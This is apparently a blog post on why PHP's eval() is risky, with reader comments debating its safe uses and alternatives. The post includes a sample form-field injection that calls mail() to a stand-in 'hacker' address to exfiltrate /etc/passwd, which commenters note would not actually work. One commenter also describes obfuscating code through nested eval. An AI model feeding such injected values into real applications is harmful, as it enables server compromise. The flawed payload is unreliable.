JSON creator Douglas Crockford more than once pointed out that: in JavaScript, eval is evil. Well in PHP, eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally have no guts to use it. Allowing any user-supplied data to go into an eval( ) call is asking to be hacked.
eval( ) has aliases. Do not use the /e option with preg_replace( ), the preg_replace( ) function with the /e option also calls eval( ) on PHP code, especially if you use any user-entered data in the calls.
So what does eval do? In eval ( string $code_str ), eval evaluates the string given in code_str as PHP code. Imagine you get a form username input field value using eval($_POST['username']), if the hacker type the following value in the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'). You will be sending your server password to the hacker.
So don’t use eval unless you are suicidal. ;)
I find eval very helpful in varible setting examples, for example:
eval(‘$this->debug =’ . (IS_PHP4 ? ‘&’ : ”) . ‘ new stdClass();’);
The only cases where eval is “evil” are whereyou’re inputting user data into eval – but you should be validating and sanitising any user input anyway.
Hi, Ross
in your case, it provides convenience and really helpful. What I mentioned in my post was more about the possible problems eval causes.
really appreciate your opinion. :)
In your first paragraph you’re assuming that any use of eval() is evil? You say that allowing any user-supplied data to go into eval() is asking to be hacked; that’s not the same thing as just using eval().
I was using eval() today (though, admittedly, I am strongly against eval() too) but none of the data in it is user-supplied.
“if the hacker type the following value in the input field”
he get nothing with your example except an email with ‘/bin/cat /etc/passwd’ text.
I too use eval() and find it is a very useful and powerful function.
It’s only ‘evil’ to the idiots who don’t use correct input validation and allow any content to be eval()’d.
If you design your product right, you shouldn’t have any problems. Avoiding eval, for me. Just isn’t a solution.
Also, max is right.
Max is right, and I agree with Rob.
Even if they did get the contents of your passwd file, it actually only contains information on user’s, like id, username, group. No password, the password is in the Shadow file…
Uou just have to always escape the eval statement.
eval(“echo \$variable;”);
You can also use eval to return some reference or value:
$result_variable = eval(“return \$static”.$dynamic.”;”);
Eval can be a useful function, however it can also be an open invitation for malicious code. In most cases, eval can and should be avoided, especially when validating user inputted data.
Eval, imho, is best used as a limited method for interpreting templated data (ie Smarty), but again anytime you give users the power of the programmer bad things can happen.
Just a word of caution to all my fellow programmers… no one writes code using eval with the idea that it can be manipulated… so just be very careful how you use it.
- Mike :o)
/etc/passwd is useless anyways.
eval() is used in php frameworks.
Specifically, it can be used in declaring dynamic variables.
ex.
$varname=”myvar”;
eval(“\${$myvar}=12345;”);
I mostly use eval to help obfuscating…
I know, it doesn’t really help obfuscating but I’ve made a program which nests every eval by eval by eval with some string “encryptions” which defer randomly to help keep skids and possible paying customers (LOL) away from my sourcecode (of course assuming I sold them the system without rights to source).
It can be broken, but it really helps cut down on piracy. There is some server time going into decoding each time but for some scripts a few milliseconds doesn’t matter.
Pingback: How do I execute PHP that is stored in a MySQL database? - Programmers Goodies
Even if they DID obtain the contents of /etc/passwd, it’s not like it’d matter. /etc/shadow is what they would really want and you’d have to run your PHP script as root or as user in the shadow group. Which, my friends, is pure suicidal.
There are many cases where you can write code to prevent the use of eval().
Have you tried:
$$varname=12345;Look up variable variables. They work wonders.
I must say, you should NEVER couple your code so tightly that you need to eval() it.
Try this, it not only adds structure, but allows you to keep separate codebases.
if(IS_PHP4) include 'php4_codebase.php';
else include 'php5_codebase.php';
99% of cases that you’d need to use eval() you can avoid with a little bit of logic and a quick dose of documentation.
in my website /public_html/ i found a extra php file,name a.php
and i open this a.php by dreamwear, it’s show
can someone tell me what’ this mean.
my website was direct to other website that was not belong to me.
how can i prevent this.
use eval only if you have a specific purpose but don’t abuse using eval. there are many ways you can do without using eval. because eval gives other programmers to modify externally your system without having intentional. putting eval in your code is giving your system a backdoor.
[quote]
because eval gives other programmers to modify externally your system without having intentional. putting eval in your code is giving your system a backdoor.
[/quote]
Nonsense.
If you properly design your code, then there should be no problem with using eval at all.
Just make sure that you know exactly what is going into eval.
Eval can be very helpful is you have very dynamic systems and enables you as a programmer to write very compact code that would otherwise need very complex structures.
Had to chime in here, been researching the use of eval() for a dynamic solution in eCommerce. We want to give additional functionality to our customers (store owners) allowing them configure their own rules for handling distribution. i.e. order > 70 do x, order < 50 do y etc.
A valid use of eval(); (If done correctly).